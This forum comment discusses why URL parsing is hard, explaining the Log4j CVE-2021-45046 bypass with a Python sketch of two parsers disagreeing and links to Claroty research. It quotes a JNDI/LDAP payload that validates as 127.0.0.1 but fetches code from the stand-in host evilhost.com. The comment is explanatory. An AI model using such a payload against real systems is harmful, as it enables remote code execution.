Another post in this thread was downvoted and flagged (really?) for claiming that URL parsing isn't difficult. The linked article claims that "Parsing URLs correctly is surprisingly hard." As a software tester, I'm very willing to believe that, but I don't know that the article really made the case.
I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated a URL behaved differently from a separate parser used to fetch the URL, so a URL like
jndi:ldap://127.0.0.1#.evilhost.com:1389/a
is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.
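You can see the same kind of two-parser confusion in a few lines of Python. This is only an illustrative sketch, not the actual Log4j code path: urllib.parse stands in for the "validator" (it treats everything after '#' as a fragment), and a deliberately naive string split stands in for a "fetcher" that ignores the fragment delimiter.

```python
from urllib.parse import urlsplit

url = "ldap://127.0.0.1#.evilhost.com:1389/a"

# Parser 1 (the "validator"): urllib treats '#' as the start of the
# fragment, so the host it extracts is just 127.0.0.1.
validated_host = urlsplit(url).hostname
print(validated_host)  # 127.0.0.1

# Parser 2 (a naive "fetcher", hypothetical): take everything between
# '//' and the last ':' as the host, without handling '#'.
fetched_host = url.split("//", 1)[1].rsplit(":", 1)[0]
print(fetched_host)  # 127.0.0.1#.evilhost.com
```

If the fetcher then hands its host string to a DNS resolver, the lookup lands in the attacker-controlled evilhost.com zone even though validation saw only 127.0.0.1.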
I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:
https://claroty.com/team82/research/exploiting-url-parsing-c...
Paper here:
https://web-assets.claroty.com/exploiting-url-parsing-confus...
If you remember the Log4j vulnerability from a couple of years ago, that was a URL parsing bug.